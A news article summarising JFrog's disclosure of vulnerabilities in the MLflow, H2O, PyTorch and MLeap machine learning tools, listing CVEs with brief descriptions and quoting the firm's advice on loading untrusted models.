In a startling revelation, cybersecurity specialists have identified a myriad of security flaws compromising popular open-source machine learning (ML) platforms, including MLflow, H2O, PyTorch, and MLeap. These vulnerabilities hold the potential to facilitate unauthorized code execution, posing significant risks to organizations leveraging these technologies.
The vulnerabilities, uncovered by JFrog, form part of an extensive ensemble of 22 security deficiencies disclosed by the supply chain security firm in its recent findings. While the earlier batch of vulnerabilities primarily targeted server-side weaknesses, the latest revelations spotlight exploitable flaws within ML clients and libraries managing ostensibly secure model formats like Safetensors.
“Compromising an ML client within an organization grants adversaries the capacity for profound lateral movement, enabling them to infiltrate critical systems,” JFrog stated. “Such clients typically possess access to essential ML infrastructures, including Model Registries and MLOps Pipelines.”
This breach of security could further jeopardize sensitive credentials associated with model registries, effectively equipping malicious actors to embed backdoors in stored ML models or execute malicious code.
Key Vulnerabilities Highlighted:
- CVE-2024-27132 (CVSS score: 7.2): A sanitation oversight in MLflow allows a cross-site scripting (XSS) exploit when executing untrusted recipes within a Jupyter Notebook. This vulnerability could lead to remote code execution (RCE) on the client side.
- CVE-2024-6960 (CVSS score: 7.5): Unsafe deserialization within H2O when loading untrusted ML models, potentially resulting in RCE.
- TorchScript Path Traversal in PyTorch: A vulnerability in the TorchScript feature permits path traversal attacks, enabling denial-of-service (DoS) or arbitrary file overwrites. These actions can corrupt critical system files or manipulate legitimate pickle files. (No CVE identifier assigned).
- CVE-2023-5245 (CVSS score: 7.5): A path traversal issue in MLeap while processing models in zipped formats, exposing the framework to a Zip Slip vulnerability, which could culminate in arbitrary file overwrites and code execution.
Cautionary Insights:
JFrog emphasizes that ML models should never be loaded indiscriminately, even when utilizing seemingly secure formats like Safetensors, as these formats can still be exploited to execute arbitrary code.
“While AI and ML technologies promise unprecedented innovation, they simultaneously open avenues for adversaries to wreak havoc,” cautioned Shachar Menashe, JFrog’s VP of Security Research. “To mitigate these threats, organizations must exercise vigilance by scrutinizing the origins of their models. Loading untrusted models—even from a ‘secure’ repository—can trigger remote code execution, inflicting extensive harm across the organization.”
The findings underscore the imperative for enhanced scrutiny and robust security protocols in managing ML models and frameworks. With these vulnerabilities exposed, organizations must act decisively to fortify their defenses against potential breaches in their machine learning ecosystems.